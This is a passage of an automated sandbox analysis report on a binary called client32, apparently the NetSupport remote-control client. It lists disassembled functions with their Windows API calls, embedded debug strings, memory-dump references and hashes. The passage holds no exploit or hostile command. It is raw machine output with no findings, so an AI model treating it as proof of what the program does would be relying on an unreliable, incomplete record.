                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                                                • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                                                • API String ID: 2414640225-228067302
                                                                                • Opcode ID: 4806dd2360c89aae23173ee0d242eaa753ef1fe839067c9f549e94da566ade4d
                                                                                • Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
                                                                                • Opcode Fuzzy Hash: 4806dd2360c89aae23173ee0d242eaa753ef1fe839067c9f549e94da566ade4d
                                                                                • Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90
                                                                                Function 11027040 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                                • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                                • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                                • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                                • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Sleep
                                                                                • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                                • API String ID: 4250438611-314227603
                                                                                • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                                • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                                • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                                Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _strncmp.LIBCMT ref: 1100953A
                                                                                • _strncmp.LIBCMT ref: 1100954A
                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,1B702977), ref: 110095EB
                                                                                Strings
                                                                                • IsA(), xrefs: 110095A5, 110095CD
                                                                                • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                                • https://, xrefs: 1100952F
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                                • http://, xrefs: 11009535, 11009548
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strncmp$FileWrite
                                                                                • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                • API String ID: 1635020204-3154135529
                                                                                • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                Function 11027450 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                                • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
                                                                                • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                                • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                                • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                                • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 110274F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Item$ClassMessageNamePostTextWindow
                                                                                • String ID: #32770$Tapiexe
                                                                                • API String ID: 3170390011-3313516769
                                                                                • Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                                • Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                                Function 11023390 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 70windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                  • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                                • GetDlgItem.USER32(?,?), ref: 11023414
                                                                                • SetFocus.USER32(00000000), ref: 11023417
                                                                                • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 1605826578-1986719024
                                                                                • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                Function 11145120 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                                • _memset.LIBCMT ref: 1114515E
                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                                • CreatePopupMenu.USER32 ref: 111451AA
                                                                                • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                                • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                                • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                • String ID: 0
                                                                                • API String ID: 74472576-4108050209
                                                                                • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                Function 11039710 Relevance: 13.6, APIs: 9, Instructions: 132windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 11039768
                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 11039771
                                                                                • IsWindowEnabled.USER32(00000000), ref: 11039778
                                                                                • PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
                                                                                • GetParent.USER32(?), ref: 110397B6
                                                                                • GetWindowRect.USER32(?,?), ref: 110397C3
                                                                                • IntersectRect.USER32(?,?,?), ref: 110397FC
                                                                                • GetWindowRect.USER32(00000000,?), ref: 11039836
                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
                                                                                • String ID:
                                                                                • API String ID: 818519836-0
                                                                                • Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                                • Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
                                                                                • Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                                • Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50
                                                                                Function 11153730 Relevance: 13.6, APIs: 9, Instructions: 128windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 11153763
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                                • SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                                • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                                • SelectObject.GDI32(00000000,?), ref: 111538C1
                                                                                • SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
                                                                                • DeleteDC.GDI32(00000000), ref: 111538D8
                                                                                • ReleaseDC.USER32(00000000,?), ref: 111538E7
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                • String ID:
                                                                                • API String ID: 602542589-0
                                                                                • Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                • Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
                                                                                • Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                                • Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
                                                                                Function 110CD940 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                                  • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,76963760,00000000,111F1590,?,110CD955,00000000,76963760), ref: 111103E8
                                                                                  • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD955,00000000,76963760), ref: 11110408
                                                                                • EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                • IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
                                                                                • DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                                • String ID:
                                                                                • API String ID: 1497311044-0
                                                                                • Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                • Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
                                                                                • Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                • Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
                                                                                Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStockObject.GDI32(00000003), ref: 111135A7
                                                                                • FillRect.USER32(?,?,00000000), ref: 111135C4
                                                                                • FillRect.USER32(?,?,00000000), ref: 111135D2
                                                                                • SetROP2.GDI32(?,00000007), ref: 111135FE
                                                                                • SetBkMode.GDI32(?,?), ref: 1111360A
                                                                                • SetBkColor.GDI32(?,?), ref: 11113615
                                                                                • SetTextColor.GDI32(?,?), ref: 11113620
                                                                                • SetTextJustification.GDI32(?,?,?), ref: 11113631
                                                                                • SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
